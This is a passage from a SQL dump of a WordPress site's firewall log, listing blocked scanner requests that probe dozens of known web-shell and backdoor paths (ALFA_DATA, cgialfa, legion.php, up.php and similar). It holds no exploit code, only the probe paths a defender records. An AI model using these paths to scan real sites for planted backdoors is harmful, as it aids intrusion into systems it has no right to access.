User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3hsZWV0LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11463,1674015038.963525,1674015038.854900,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/olux.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L29sdXgucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11464,1674015038.700624,1674015038.588200,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/index.php?3x=3x','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2luZGV4LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11465,1674015038.363495,1674015038.255100,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ubh/up.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91YmgvdXAucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11466,1674015037.646630,1674015037.534500,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/admin/controller/extension/extension/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2FkbWluL2NvbnRyb2xsZXIvZXh0ZW5zaW9uL2V4dGVuc2lvbi9jZ2lhbGZh\",\"category\":\"brute-force\",\"ssl\":1}'),(11467,1674015036.952661,1674015036.823000,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/admin/controller/extension/extension/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2FkbWluL2NvbnRyb2xsZXIvZXh0ZW5zaW9uL2V4dGVuc2lvbi9hbGZhY2dpYXBp\",\"category\":\"brute-force\",\"ssl\":1}'),(11468,1674015036.152574,1674015036.036200,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/admin/controller/extension/extension/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2FkbWluL2NvbnRyb2xsZXIvZXh0ZW5zaW9uL2V4dGVuc2lvbi9BTEZBX0RBVEE=\",\"category\":\"brute-force\",\"ssl\":1}'),(11469,1674015035.488392,1674015035.377400,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/sites/default/files/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NpdGVzL2RlZmF1bHQvZmlsZXMvY2dpYWxmYQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11470,1674015034.718669,1674015034.611400,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/sites/default/files/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NpdGVzL2RlZmF1bHQvZmlsZXMvYWxmYWNnaWFwaQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11471,1674015034.023247,1674015033.908000,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/sites/default/files/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NpdGVzL2RlZmF1bHQvZmlsZXMvQUxGQV9EQVRB\",\"category\":\"brute-force\",\"ssl\":1}'),(11472,1674015033.255217,1674015033.145900,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/templates/beez3/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3RlbXBsYXRlcy9iZWV6My9jZ2lhbGZh\",\"category\":\"brute-force\",\"ssl\":1}'),(11473,1674015032.530156,1674015032.417900,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/templates/beez3/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3RlbXBsYXRlcy9iZWV6My9hbGZhY2dpYXBp\",\"category\":\"brute-force\",\"ssl\":1}'),(11474,1674015031.835075,1674015031.727800,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/templates/beez3/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3RlbXBsYXRlcy9iZWV6My9BTEZBX0RBVEE=\",\"category\":\"brute-force\",\"ssl\":1}'),(11475,1674015031.104375,1674015030.995500,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvY2dpYWxmYQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11476,1674015030.010357,1674015029.899500,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvYWxmYWNnaWFwaQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11477,1674015029.297744,1674015029.182000,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvQUxGQV9EQVRB\",\"category\":\"brute-force\",\"ssl\":1}'),(11478,1674015028.297883,1674015028.191500,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWFkbWluL2NnaWFsZmE=\",\"category\":\"brute-force\",\"ssl\":1}'),(11479,1674015027.377833,1674015027.268600,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWFkbWluL2FsZmFjZ2lhcGk=\",\"category\":\"brute-force\",\"ssl\":1}'),(11480,1674015026.560841,1674015026.440400,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWFkbWluL0FMRkFfREFUQQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11481,1674015025.900111,1674015025.792100,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-includes/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWluY2x1ZGVzL2NnaWFsZmE=\",\"category\":\"brute-force\",\"ssl\":1}'),(11482,1674015025.240705,1674015025.127000,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-includes/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWluY2x1ZGVzL2FsZmFjZ2lhcGk=\",\"category\":\"brute-force\",\"ssl\":1}'),(11483,1674015024.544136,1674015024.431700,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-includes/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWluY2x1ZGVzL0FMRkFfREFUQQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11484,1674015023.826962,1674015023.721300,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/uploads/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvdXBsb2Fkcy9jZ2lhbGZh\",\"category\":\"brute-force\",\"ssl\":1}'),(11485,1674015022.888530,1674015022.777800,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/uploads/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvdXBsb2Fkcy9hbGZhY2dpYXBp\",\"category\":\"brute-force\",\"ssl\":1}'),(11486,1674015022.187728,1674015022.082300,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/uploads/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvdXBsb2Fkcy9BTEZBX0RBVEE=\",\"category\":\"brute-force\",\"ssl\":1}'),(11487,1674015021.509297,1674015021.401800,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/.well-known/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"Ly53ZWxsLWtub3duL2NnaWFsZmE=\",\"category\":\"brute-force\",\"ssl\":1}'),(11488,1674015020.585083,1674015020.474800,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/.well-known/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"Ly53ZWxsLWtub3duL2FsZmFjZ2lhcGk=\",\"category\":\"brute-force\",\"ssl\":1}'),(11489,1674015018.916772,1674015018.807900,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/.well-known/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"Ly53ZWxsLWtub3duL0FMRkFfREFUQQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11490,1674015018.246220,1674015018.133500,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2NnaWFsZmE=\",\"category\":\"brute-force\",\"ssl\":1}'),(11491,1674015017.520655,1674015017.402700,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2FsZmFjZ2lhcGk=\",\"category\":\"brute-force\",\"ssl\":1}'),(11492,1674015016.752037,1674015016.636100,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L0FMRkFfREFUQQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11493,1674015016.041463,1674015015.929500,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/error.php?phpshells=','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2Vycm9yLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11494,1674015015.362305,1674015015.229100,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-backup-sql-302.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWJhY2t1cC1zcWwtMzAyLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11495,1674015014.656684,1674015014.546800,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/system_log.php?bala=up','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3N5c3RlbV9sb2cucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11496,1674015013.922839,1674015013.808300,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/outcms.php?up=','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvb3V0Y21zLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11497,1674015000.269507,1674015000.159300,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/db-cache.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvZGItY2FjaGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11498,1674014998.968129,1674014998.859200,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/gank.php.PhP','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2dhbmsucGhwLlBoUA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11499,1674014997.883510,1674014997.775600,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-plugins.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLXBsdWdpbnMucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11500,1674014995.863525,1674014995.756700,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/legion.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2xlZ2lvbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11501,1674014995.096033,1674014994.953400,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/config.bak.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL2NvbmZpZy5iYWsucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11502,1674014994.720387,1674014994.610500,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/config.bak.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2NvbmZpZy5iYWsucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11503,1674014993.519933,1674014993.414000,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/mu-plugins/db-safe-mode.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvbXUtcGx1Z2lucy9kYi1zYWZlLW1vZGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11504,1674014992.816840,1674014992.705400,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/backup_index.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9iYWNrdXBfaW5kZXgucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11505,1674014992.095178,1674014991.988600,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-booking.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWJvb2tpbmcucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11506,1674014987.932899,1674014987.785600,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-includes/wp-class.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWluY2x1ZGVzL3dwLWNsYXNzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11507,1674014985.815914,1674014985.710500,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/media-admin.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L21lZGlhLWFkbWluLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11508,1674014984.675584,1674014984.563500,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-signin.php?dizo=&ping=','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLXNpZ25pbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11509,1674014983.769854,1674014983.634900,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/ups.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3Vwcy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11510,1674014981.271783,1674014981.165600,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/doc.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2RvYy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11511,1674014980.051014,1674014979.935700,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/radio.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3JhZGlvLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11512,1674014978.519339,1674014978.369500,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/s_ne.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NfbmUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11513,1674014977.803664,1674014977.690500,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/s_e.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NfZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11514,1674014976.612734,1674014976.498600,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/style.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWFkbWluL3N0eWxlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11515,1674014976.250749,1674014976.135800,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/style.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3N0eWxlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11516,1674014975.564158,1674014975.434700,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-load.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious 